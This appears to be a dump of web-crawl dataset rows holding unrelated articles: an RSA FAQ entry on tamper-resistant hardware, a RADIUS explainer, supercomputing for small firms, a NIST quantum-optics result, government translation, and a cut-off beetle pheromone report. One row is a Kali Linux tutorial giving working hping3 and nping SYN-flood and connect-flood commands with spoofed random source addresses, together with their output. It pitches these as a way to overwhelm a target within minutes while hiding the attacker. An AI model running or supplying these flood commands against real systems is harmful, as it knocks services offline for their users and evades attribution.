text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
7.21 What is tamper-resistant hardware?
One part of designing a secure computer system is ensuring that various cryptographic keys can be accessed only by their intended user(s) and only for their intended purposes. Keys stored inside a computer can be vulnerable to use, abuse, and/or modification by an unauthorized attacker.
For a variety of situations, an appropriate way to protect keys is to store them in a tamper-resistant hardware device. These devices can be used for applications ranging from secure e-mail to electronic cash and credit cards. They offer physical protection to the keys residing inside them, thereby providing some assurance that these keys have not been maliciously read or modified. Typically, gaining access to the contents of a tamper-resistant device requires knowledge of a PIN or password; exactly what type of access can be gained with this knowledge is device-dependent.
Some tamper-resistant devices do not permit certain keys to be exported outside the hardware. This can provide a very strong guarantee that these keys cannot be abused: the only way to use these keys is to physically possess the particular device. Of course, these devices must actually be able to perform cryptographic functions with their protected keys, since these keys would otherwise be useless.
Tamper-proof devices come in a variety of forms and capabilities. One common type of device is a ``smart card,'' which is approximately the size and shape of a credit card. To use a smart card, one inserts it into a smart card reader that is attached to a computer. Smart Cards are frequently used to hold a user's private keys for financial applications; Mondex (see Question 4.2.4) is a system that makes use of tamper-resistant hardware in this fashion.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:ac682401-4580-4fd0-873c-27eab32d2871> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-tamper-resistant-hardware.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00083-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920979 | 651 | 3.234375 | 3 |
RADIUS: Secure Authentication Services at Your Service
Isn’t it wonderful that we can connect to ISPs or office networks from anywhere, using any access technology? Have you ever wondered how ISPs and office networks know whether or not a user has a legitimate account? And how does a provider keep track of a user's access time anyway? The answer is very likely RADIUS, the most widely deployed example of an Authentication, Authorization, and Accounting system (sometimes called AAA systems).
RADIUS is a set of AAA standards that has been implemented by many vendors. It has been around for ages, quietly providing services that keep networks secure from unauthorized use. Let's delve in and learn more about this useful capability and how it can benefit you and your company's network.
Thirty years ago, ARPANET, the predecessor to the Internet, was built to permit dumb terminals to access remote computing resources. In the days before PCs and LANs, the hardwired connection between the terminal and computer was managed by a Terminal Interface Processor, or TIP. But even then, managers, developers, and users wanted to be able to work from home or on the road (dial-up via an acoustically-coupled modem). Bandwidth was scarce and expensive, and people wanted to protect the network, and the mainframes and minicomputers on it, from unauthorized access and possible disruption.
It quickly became apparent that the use of unlisted dial-in numbers was not a secure answer. Was there something that could be done to further protect the network from unauthorized access? TACACS, the original AAA system, was developed for the ARPANET to solve that problem. Later, commercial companies adopted and extended the technology in open and proprietary ways. With experience and the expanding use of data networks, the limitations of the original TACACS architecture became apparent.
RADIUS was originally developed by Steve Wilens of Livingston Enterprises and then later acquired by Lucent Technologies in 1992, and is now an IETF standard. The most recent version is RFC 2865 (June 2000), which covers both authentication and authorization. A companion IETF document, RFC 2866, describes how to extend RADIUS to implement accounting services.
What Is It Used For?
The need for AAA systems has grown tremendously over the years. Corporations (and carriers) still support dial-up lines of course, but now remote users also access networks via VPNs and broadband, while employees and guests connect to internal wireless networks simply by powering up their laptops and PCs. Today's AAA systems must be highly robust, scaleable, secure, and easily manageable to meet the needs of a modern IT environment.
Basic RADIUS implementations provide access control by authenticating end users and authorizing their requests, while extended implementations include user accounting. Depending on the RADIUS product, you can:
- Centrally administer access to your network resources, perhaps with fine control over access based on time of day or by regulating the number of simultaneous log-ins by a single user
- Utilize the function and information from your other access control systems, such as the Netware NDS and Windows Active Directory
- Allow your dial-in or VPN service vendors to query your access control database, so any changes you make are automatically available to them
- Create central summary or real-time reports that can audit usage for tracking and billing
If you have not already implemented RADIUS in your network, new technologies like wireless Ethernet should prompt you to consider it for the future.
How RADIUS Works
Fundamentally, “RADIUS is a highly extensible UDP client/server application protocol. A full server implementation of RADIUS consists of two servers: the RADIUS server itself (for Authentication and Authorization) and the RADIUS accounting server that binds to UDP ports 1812 and 1813, respectively,” says Bruce Morrison of Pegasus Networks. There are actually three types of applications that participate in RADIUS: the end user, the RADIUS client, and the RADIUS server.
- The end-user application, such as a dial-up utility, is in the end user’s PC or laptop. It talks with the RADIUS client as part of establishing a connection.
- Typically, the RADIUS client software is installed in a device at the network edge, where external traffic first enters a company’s or ISP’s infrastructure. For example, it could be located in a remote access server or firewall. The RADIUS client communicates with the end user and with the RADIUS server.
- The RADIUS server can be anywhere. The only requirement is for reliable and sufficient network connectivity between it and its clients. The RADIUS server checks the configuration database and processes the request using one or more authentication mechanisms. The database contains client service configuration data as well as specific rules for granting access. The database can be implemented separately from the server.
Because each of the three software packages is typically developed and marketed by different vendors, adherence to standards is very important.
Here are the step by step details of what happens when an end user account accesses a network using RADIUS authentication:
- The RADIUS client receives the account username and password from the end user.
- The client sends an Access-Request to the RADIUS server with information such as the end user’s username, password, and the port-id on which the end user’s traffic is arriving over the network. The client is configured to wait for a response for a specified time. It may try again by retransmitting the request to the same server or to a different one.
- When a server receives the Access-Request, it first validates the sending client. It then authenticates the end user data by consulting the end user database entry to verify the password and any additional requirements, such as which clients or client ports the end user is permitted to use.
- If a server does not have direct access to the required database entry, and if it has been configured appropriately, the RADIUS server can act as a proxy and query another RADIUS server to get the information it needs. This facilitates implementation of capabilities such as roaming, in which one administrative entity “owns” the user and another administrative entity owns the network where access is managed.
- Finally, if and when the server is satisfied that the end user is authenticated and authorized to access the network, the RADIUS server sends a list of service configuration values back to the client. For example, a SLIP or PPP connection might be specified with values for the IP address and subnet mask. The client implements these values and the end user is given access to the network.
Additional steps might be needed if accounting options are enabled. The client might notify the server at the start and end of a session, and proxies can be used for accounting, just as they are in establishing authentication and access authorization.
A Relationship Based on Security and Trust
Security and trust are at the heart of the RADIUS client and server interaction. Their transactions are authenticated using a shared secret. To be certain that an outsider can never spoof either party, the shared secret is never transmitted over the network. Instead, it is configured directly into the client and server. The protocol also allows RADIUS servers to issue cryptographically-based challenges (ultimately responded to by the end user) as an extra security measure.
What makes RADIUS so versatile is that it does not dictate the end user connection or communication with the client, so it could be dial-up, hardwired to a switch port, wireless, or some new technology that hasn’t been invented yet. The connection password can and should be protected using a mechanism appropriate to the link technology. It also does not dictate the method used by the server to authenticate a password, once it knows the end user’s username and password.
The basis of RADIUS operations is the exchange of attributes between the client and server. The use of standard attributes, such as user name, password, service, addressing, and timeout information, is determined by your requirements and configuration.
RADIUS also supports the use of vendor-specific attributes — vendor-defined extensions that are implemented in only certain products, such as one vendor’s firewalls or remote access servers. When purchasing a RADIUS server, make sure that it has support for the vendor-specific attributes that are important to your network and the equipment (associated with clients) that you have or are planning to buy.
Deployment Architecture Choices
Since RADIUS supports distributed operations, the first important decision in your RADIUS deployment design is whether to outsource the management of the servers or to keep it in-house. If you neither have nor want to acquire in-house RADIUS expertise, the cost of outsourcing may compare favorably with in-house RADIUS server acquisition and operation.
If you do decide to keep it in-house, there are some important considerations for the RADIUS implementation. The RADIUS server software runs on either a dedicated or shared server platform. Like any popular client-server protocol, RADIUS server implementations are available for a variety of operating system environments, including network appliances.
Since the goal of RADIUS is to secure and control access to your network, proper RADIUS database configuration is paramount. It all comes down to good policy design first, and then implementation in the RADIUS server. Your access policy covers the rules for granting access to the network and specifying when and how RADIUS security mechanisms are used to safeguard its operation. It may be as simple as table look-ups, or it may use more sophisticated logic to look at history, behavior, or current conditions.
The configuration also includes the distribution and storage of the shared client and server secrets, and if and when challenges are used. Good security design is based on experience and an understanding of your particular needs, as well as the specifics of your network technology. If you don’t have in-house expertise, consider some outside help.
RADIUS performance can be sensitive to client retransmission or retry strategies. There is no explicit way for a RADIUS server to tell a client it is busy. Instead, RADIUS relies on the client to be well-behaved, waiting a reasonable amount of time before retransmitting the request to the same server, or contacting a different RADIUS server.
A badly configured client can quickly overload the servers with repeated requests. When planning a RADIUS deployment, you should remember that this is a client-side issue, not a problem in the server. Your goal should be to configure clients with a reasonable retransmission/retry strategy. That will depend on what is supported.
You should also aim to have sufficient server capacity so that the lack of a response is most likely due to a server’s being off the network rather than being overloaded. In addition, clients should be configured not to send test requests to RADIUS servers just to see if they are available.
Use of proxies is another consideration for RADIUS deployment design. Many small and medium-sized enterprises do not need proxies. However, using RADIUS proxies can help distribute administration in large or geographically dispersed organizations, or it can be a good means to gain quick response time for user database changes. Beware, however, that using proxies may represent a potential security concern, especially if they are not under your direct control.
RADIUS performance, availability, and scalability rely on good management of load and congestion. You need to look at total server capacity (based on hardware and software), the number and location of servers, balancing load across servers, and network connectivity/bandwidth between clients and servers. These design issues are common to many client-server architectures, not just RADIUS.
Just as TACACS was superceded by RADIUS, RADIUS itself may be replaced at some point in the future. Work on DIAMETER, a potential successor to RADIUS, has been going on for a number of years in the IETF’s AAA Working Group. DIAMETER’s improvements include a fail-over strategy, use of TCP for reliable transport (instead of UDP, as RADIUS uses), and more general support for transmission-level security (via IPSEC).
DIAMETER also adds required support for server-initiated messages (to handle unsolicited disconnects, for example) and includes optional capabilities for data object security, which is particularly important when proxies are involved. It also is more explicit about the behavior of agents, such as proxies. While many of these added capabilities are of interest to companies, they are of greater and more immediate value to ISPs.
Unfortunately, the DIAMETER protocol is not directly compatible with RADIUS. However, it has been designed to coexist with RADIUS in the same network, cooperating via a gateway or a server that implements both.
RADIUS can be very useful for ensuring that remote users are who they say they are, keeping track of their network usage, and securing your network infrastructure from intrusion. If you are not already using RADIUS, what are you waiting for? If you do not have the expertise in-house to deploy it, consider using a managed service or an appliance.
Is it time to start considering DIAMETER products for your future deployments? Not just yet — while it is something to keep on your radar screen, DIAMETER is not far enough along in terms of standard vendor support or market acceptance to merit consideration for near-term implementation.
IETF specification for the RADIUS protocol: RFC 2865
IETF specification for RADIUS protocol accounting support: RFC 2866
IETF extension to RFC 2866 to include tunnel protocol support: RFC 2867
IETF extension to RFC 2865 to include tunnel protocol support: RFC 2868
IETF additional attributes that may be used with RFCs 2865 and 2866: RFC 2869
IETF specification for operation of RADIUS over IPv6: RFC 3162
IETF draft of DIAMETER base protocol (December 2002): draft-ietf-aaa-diameter-17.txt
Beth Cohen is president of Luth Computer Specialists, Inc., a consulting practice specializing in IT infrastructure for smaller companies. She has been in the trenches supporting company IT infrastructure for over 20 years in a number of different fields, including architecture, construction, engineering, software, telecommunications, and research. She is currently consulting, teaching college IT courses, and writing a book about IT for the small enterprise.
Debbie Deutsch is a principal of Beech Tree Associates, a data networking and information assurance consultancy. She is a data networking industry veteran with 25 years experience as a technologist, product manager, and consultant, including contributing to the development of the X.500 series of standards and managing certificate-signing and certificate management system products. Her expertise spans wired and wireless technologies for Enterprise, Carrier, and DoD markets. | <urn:uuid:5580fe0d-2133-4a28-ba47-462259d7d175> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/2241831/RADIUS-Secure-Authentication-Services-at-Your-Service.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00385-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927525 | 3,142 | 2.765625 | 3 |
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. In this article I will show how to carry out a Denial-of-service Attack or DoS using hping3 with spoofed IP in Kali Linux.
As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour.
Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers.
Denial-of-service threats are also common in business, and are sometimes responsible for website attacks.
This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of ‘Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.
One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.
hping3 works well if you have other DoS tools such as GoldenEye running (using multiple tools that attacks same site/server/service increases the chances of success). There are agencies and corporations to runs DoS attack map in Realtime. that shows worldwide DDoS attacks almost in realtime.
Our take on Denial-of-service Attack – DoS using hping3
Let’s face it, you installed Kali Linux to learn how to DoS, how to crack into your neighbors Wireless router, how to hack into a remote Windows machine be that a Windows 2008 R2 server or Windows 7 or learn how to hack a website using SQL Injection. There’s lot’s of guide that explain it all. In this guide, I am about to demonstrate how to DoS using hping3 with random source IP on Kali Linux. That means,
- You are executing a Denial of Service attack or DoS using hping3
- You are hiding your a$$ (I meant your source IP address).
- Your destination machine will see source from random source IP addresses than yours (IP masquerading)
- Your destination machine will get overwhelmed within 5 minutes and stop responding.
Sounds good? I bet it does. But before we go and start using hping3, let’s just go over the basics..
hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time.
Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration.
hping3 should be used to…
- Traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities.
- Perform the idle scan (now implemented in nmap with an easy user interface).
- Test firewalling rules.
- Test IDSes.
- Exploit known vulnerabilties of TCP/IP stacks.
- Networking research.
- Learn TCP/IP (hping was used in networking courses AFAIK).
- Write real applications related to TCP/IP testing and security.
- Automated firewalling tests.
- Proof of concept exploits.
- Networking and security research when there is the need to emulate complex TCP/IP behaviour.
- Prototype IDS systems.
- Simple to use networking utilities with Tk interface.
hping3 is pre-installed on Kali Linux like many other tools. It is quite useful and I will demonstrate it’s usage soon.
DoS using hping3 with random source IP
That’s enough background, I am moving to the attack. You only need to run a single line command as shown below:
root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 1189112 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~#
Let me explain the syntax’s used in this command:
hping3= Name of the application binary.
-c 100000= Number of packets to send.
-d 120= Size of each packet that was sent to target machine.
-S= I am sending SYN packets only.
-w 64= TCP window size.
-p 21= Destination port (21 being FTP port). You can use any port here.
--flood= Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
--rand-source= Using Random Source IP Addresses. You can also use -a or –spoof to hide hostnames. See MAN page below.
www.hping3testsite.com= Destination IP address or target machines IP address. You can also use a website name here. In my case resolves to 127.0.0.1 (as entered in
So how do you know it’s working? In hping3 flood mode, we don’t check replies received (actually you can’t because in this command we’ve used –rand-souce flag which means the source IP address is not yours anymore.)
Took me just 5 minutes to completely make this machines unresponsive (that’s the definition of DoS – Denial of Service).
In short, if this machine was a Web server, it wouldn’t be able to respond to any new connections and even if it could, it would be really really slow.
Sample command to DoS using hping3 and nping
I found this article which I found interesting and useful. I’ve only modified them to work and demonstrate with Kali Linux (as their formatting and syntaxes were broken – I assume on purpose :) ). These are not written by me. Credit goes to Insecurety Research
Simple SYN flood – DoS using HPING3
root@kali:~# hping3 -S --flood -V www.hping3testsite.com using lo, addr: 127.0.0.1, MTU: 65536 HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 746021 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~#
Simple SYN flood with spoofed IP – DoS using HPING3
root@kali:~# hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com using lo, addr: 127.0.0.1, MTU: 65536 HPING www.hping3testsite.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown ^C --- www.hping3testsite.com hping statistic --- 554220 packets transmitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms root@kali:~#
TCP connect flood – DoS using NPING
root@kali:~# nping --tcp-connect -rate=90000 -c 900000 -q www.hping3testsite.com Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST ^CMax rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684ms TCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%) Nping done: 1 IP address pinged in 3.09 seconds root@kali:~#
Source: Insecurety Research
Any new and modern firewall will block it and most Linux kernels are built in with SYN flood protection these days. This guide is meant for research and learning purpose. For those who are having trouble TCP SYN or TCP Connect flood, try learning IPTables and ways to figure out how you can block DoS using hping3 or nping or any other tool. You can also DoS using GoldenEye that is a layer 7 DoS attack tool to simulate similar attacks or PHP exploit to attack WordPress websites.
p.s. I’ve included hping3 manpage in the next page in case you want to look that one up.
Please share and RT. | <urn:uuid:deca3cce-7745-4d3d-a9a3-6cfe4ac4820c> | CC-MAIN-2017-04 | https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00111-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.878402 | 2,317 | 2.96875 | 3 |
Many Small to Medium Enterprises (SMEs) across the UK and beyond are unaware that supercomputing can help them become more energy efficient.
With major energy suppliers recently announcing yet more price hikes, companies across all industries are feeling the pinch.
Three of the ‘big six’ British energy firms have increased their prices between eight and ten per cent on last year’s costs, and this rise could have a profound effect on the performance of SMEs across the country and beyond.
In addition, in our digital age, it is only a natural progression for businesses to increasingly boost their performance by using advanced software for data-intensive tasks such as advanced modeling and simulation, analysis of Big Data and the rendering of high-definition 3D graphics.
However, with the additional computational power, time and energy required to complete these demanding tasks, many businesses require further support to meet their customers‘ needs, and to help reduce their carbon footprint.
Many SMEs are unaware that this support could arrive in the form of supercomputing, also known as high performance computing. Often the belief is that access to supercomputing technology is limited to only the largest companies with the biggest spending power.
Although traditionally the preserve of blue chip companies and academia, SMEs can now benefit from access to supercomputing technology, training and support. The technology can significantly boost their output, while increasing their in-house energy efficiency.
So how can supercomputing help businesses achieve this?
Significant time savings
With the power of supercomputing, businesses can vastly reduce the time they spend on demanding data-intensive tasks, significantly reducing their power consumption.
One SME that has benefited from supercomputing support is Wales-based ThinkPlay.TV, an animation company founded in 2006. To date, its virtual animation work and media sets have featured on the likes of Playstation, Wii and Xbox games consoles and national UK television channels.
Typically, before the company used supercomputing, scenery would take eight hours for them to render in-house, giving them a maximum of two weeks to meet client deadlines. Furthermore, with only two desktops carrying out rendering for large periods of time, the co-founders were both unable to work on anything else.
Now, with the use of supercomputing technology, projects that would normally have taken days to complete, are finished in hours.
As work can be completed so much faster, it has helped the firm win bids for more projects, as well as significantly reducing the energy that it spends on in-house computing processes.
Accessing supercomputing technology remotely can save businesses energy in a number of ways.
Firstly, they do not have to travel to access a supercomputing hub. This in itself presents energy savings to businesses. In addition, with remote access technology, businesses can benefit from high performance computing on their own desktop and laptop computers, without the need to continually update in-house technology.
As supercomputing dramatically increases the speed of computing processes, this will then free-up other on-site IT resources. Therefore, using supercomputing boosts companies’ overall IT capacity because all data and power intensive processing is taken off site. Doing so will also help to reduce business’ overall onsite energy consumption.
Remote access to high performance computing can also be provided ‘on demand’, so companies’ use is efficient and timely, and therefore energy and resources are not wasted on ‘idling time’ from machines.
A company directly benefiting from this remote access to supercomputing technology is Calon Cardio-Technology Ltd. The company is designing and developing the next generation of affordable, implantable micro blood pumps for the treatment of chronic heart failure.
Calon Cardio uses supercomputing to simulate the flow of the blood inside the pump. Prior to using supercomputing running just one case could take up to a week, whereas now that process can be shrunk to less than a day, or even a few hours.
Green data centre management
When considering a potential supercomputing provider, businesses should ensure that the supplier has invested in dedicated Data Centre Infrastructure Management software or DCIM. This allows providers to balance computing capacity, or power drawn, with the current IT load at the time. This means that when the load is low, providers can switch hardware into ‘low activity’ or ‘standby’ modes to save energy and its associated costs.
Companies should also be sure to confirm whether a provider’s servers are designed to automatically go into ‘idle’ or ‘deep sleep’ modes during longer periods of inactivity.
Ensuring that suppliers have engaged with these critical energy-saving facilities will help to ensure that savings are passed on to businesses, but also ensures that their carbon footprints remain as small as possible.
It’s clear to see that supercomputing has a valuable role to play in boosting the competitive capability and energy efficiency of SMEs in a wide range of sectors. The UK Government’s current investment is testament to its perceived value to the future of British business.
This is down to the fact that supercomputing can reduce the time taken to complete data-intensive tasks, freeing up business’ IT systems to allow them to complete other tasks more easily.
This significant reduction in time-taken to complete tasks also results in increased energy-efficiency for SMEs, allowing them to reinvest this time and money into other aspects of service delivery for their customers.
Furthermore, by using a supercomputing provider that is already committed to saving energy, companies can also feel safe in the knowledge that their own commitments to green business practice remain intact.
How can businesses find out more about using supercomputing technology?
Whilst purchasing a dedicated supercomputer is clearly out of most small companies’ reach, there are now a number of providers in the UK offering companies access to supercomputing technology, training and support.
Supercomputing providers across the UK are increasing the level of support available, as they recognise that many businesses have no experience of using this technology. This means businesses don’t need any previous experience of supercomputing to enjoy its benefits.
About the Author
David Craddock is chief executive officer of HPC Wales. Prior to his appointment, David Craddock was Director of Enterprise and Collaborative Projects at Aberystwyth University, responsible for leading a team of over thirty and developing the enterprise strategy for the University. Working with the senior management team, David also led a number of change management programmes including business planning for the Aberystwyth/Bangor Partnership, and the merger of the BBSRC research funded institute IGER into the University. A BA (Hons) graduate from Middlesex University, David previously worked for two Unilever companies over a 23 year period, mainly in international marketing, product development and business development roles in the detergent and speciality chemicals markets. In addition, he has been Director of two SMEs in the technical textile and electrical engineering markets. | <urn:uuid:32cf963c-4f13-4726-a122-e1981f68eac1> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/02/saving-energy-supercomputing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00111-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950984 | 1,449 | 2.5625 | 3 |
Quantum science researchers have found a way to manipulate light that could enhance precision measurements as well as computing and communications based on quantum physics theory that's says a particle can exist in two states at once.
According to a paper, researchers from the National Institute of Standards and Technology (NIST) "repeatedly produced light pulses that each possessed two exactly opposite properties-specifically, opposite phases, as if the peaks of the light waves were superimposed on the troughs." Physicists call this optical state "Schrödinger's cat" after Nobel Prize winner Erwin Schrödinger who theorized cats existed in both alive and dead states. A "cat state" is a curiosity of the quantum world, where particles can exist in "superpositions" of two opposite properties simultaneously, the organization stated in a release.
NIST's quantum cat is the first to be made by detecting three photons at once and is one of the largest and most well-defined cat states ever made from light, researchers claimed.
Larger cat states have been created in different systems by other research groups, including one at NIST. In 2005 NIST scientists said they coaxed six atoms into spinning together in two opposite directions at the same time. The ambitious choreography could be useful in applications such as quantum computing and cryptography, as well as ultra-sensitive measurement techniques, all of which rely on exquisite control, NIST said.
"This is a new state of light, predicted in quantum optics for a long time," says NIST research associate Thomas Gerrits, lead author of the paper. "The technologies that enable us to get these really good results are ultrafast lasers, knowledge of the type of light needed to create the cat state, and photon detectors that can actually count individual photons."
Follow Michael Cooney on Twitter: nwwlayer8
Layer 8 Extra
Check out these other hot stories: | <urn:uuid:303b27f3-6f2c-4dfc-8150-c9b917062b1d> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2227050/security/researchers-build-mysterious--quantum-cats--from-light.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00413-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.95166 | 390 | 3.640625 | 4 |
The United States dollar is weak, driving an increasing orientation towards global exports. The Korean manufacturer Samsung and America’s Apple are in a patent war over mobile phones. The average annual income in China has quadrupled. Terrorists have taken root in remote countries, from those in the Sahel region of Africa to Chechnya.
Open up the news on any given day, and these are the global issues you’ll read about. Every one of these challenges impacts the US government. And each issue requires language translation, either into English or from English into another language.
But there are petabytes of data on the Internet to sift through and translate. The government doesn’t have the time or budget to hire an army of human translators for every job. Machine translation, while faster and more cost-effective than humans, only generates moderate to poor results for the majority of languages. The key lies in bridging the gap between translation memory — the databases of terms that feed machine translation — and human language intelligence.
Assimilation and Dissemination
Government agencies apply translation in two primary ways: assimilation and dissemination. Assimilation is used for intelligence purposes, economic research and information analysis activities. It involves gathering and translating content from countries around the world, then gauging the importance of each piece of content. Analysts can then judge the context of the information and escalate if necessary.
For example, SITE Intelligence Group, a private intelligence agency and government contractor, sifts through hours of video, blog posts, forums and other online sources every day to track and translate terrorist activity. In order to unveil important findings in a timely manner, SITE must translate quickly and effectively, not missing anything that might indicate suspicious actions. One of their more recent finds was a fatwa death sentence issued by an Egyptian clergyman, targeted at those involved with the “Innocence of Muslims” movie.
Dissemination, the other way that government uses translation, involves translating English documents into other languages for targeted dissemination. For example, the World Health Department has a substance abuse treatment program that is aiming to translate its processes for managing substance abuse for use in non-English speaking cultures. The initiative aims to “achieve different language versions of the English …[with a] focus on cross-cultural and conceptual, rather than on linguistic/literal equivalence.” In other words, WHO recognizes that translation is not just a matter of 1:1 language translation, but also of localization and coordination with differing cultural norms.
Language as Fuel
While different in nature, translation for assimilation and dissemination have one major thing in common. They both require the accumulation of linguistic resources, through translation memory, to propel future translations. This memory can be applied to machine translation to continue to improve upon the translation which occurs. Yet realistically, machine translation has years to decades more memory to build before it can be accurate across languages.
In the meantime, the ideal scenario would be for machines to generate decent baseline translations in all languages, then have humans edit and localize content if needed. With limited translation memory, how do we get there?
Humans and Machines Working Together
Human translators, whether professional or casual, must continue to feed high-quality translations into machine software. As more humans enter translations into their software, translation memory captures better information, enabling machine translation to produce higher-quality results. Machine translation generates garbage if it only receives bad translations, so in a sense, the onus is on humans to make machine translation smarter.
When machine translation has a large corpus of quality translation memory, it can generate instant and accurate translations. The government’s assimilation jobs will have readily available translations across languages, streamlining the process of intelligence, economic analysis and other tasks. For dissemination purposes, the government can use machines for basic translations, and humans to add cultural context.
We’re still a far way off from that reality today, but with enough human input, we can change the way translation is done in government. | <urn:uuid:733f2ac6-4880-4aa1-830b-bb852970d8b9> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2473058/government-it/translation-as-fuel--how-government-translation-memory-will-evolve.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00321-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.90115 | 824 | 2.5625 | 3 |
(Phys.org)—A team of researchers with members from several institutions in Germany has found that the female burying beetle gives off a pheromone during parental care that causes male beetles to temper their sexual advances. In their paper published in the journal Nature Communications, the team describes their study of hundreds of the beetles captured in a German forest and brought to their lab. Burying beetles lay their eggs in dead animal carcasses—when the young hatch, the mother, and to some extent, the father take bites from the carcass, chew it, and then feed it to the young. They also both fend off predators. Prior research had shown that during this time period the female emits a gas of some sort, and that there was less sexual activity than normal. In this new effort, the researchers sought to learn the properties of the gas and to determine if it was responsible for the decrease in sexual activity, which in turn led to better care for the young. To find out, the team captured approximately 400 of the beetles, split them into groups of those with offspring, and those without, and then ran several experiments and tests on them. One of the tests involved measuring hormone levels in the females—in so doing, the researchers found that one called 'juvenile hormone III' increased, causing the female to be less fertile during the time she was caring for her young. They also found that she emitted a similar chemical called methyl generate, a pheromone, during the same time frame. Next the team ran several experiments to determine if it was the pheromone that caused the antiaphrodisiac-type effect in males—one of which involved monitoring the release levels of the pheromone and the sexual activity of males when the young were removed from both parents, preventing parental care. They found that the production and emission of the hormone did indeed suppress sexual advances by males, which allowed both to better parent their offspring. The researchers note that the emitted chemical allows both parents to invest more resources into offspring and it represents an effective form of communication between parents that benefits them both and their offspring. Explore further: Older males make better fathers: Mature male beetles work harder, care less about female infidelity More information: Katharina C. Engel et al. A hormone-related female anti-aphrodisiac signals temporary infertility and causes sexual abstinence to synchronize parental care, Nature Communications (2016). DOI: 10.1038/ncomms11035 Abstract The high energetic demand of parental care requires parents to direct their resources towards the support of 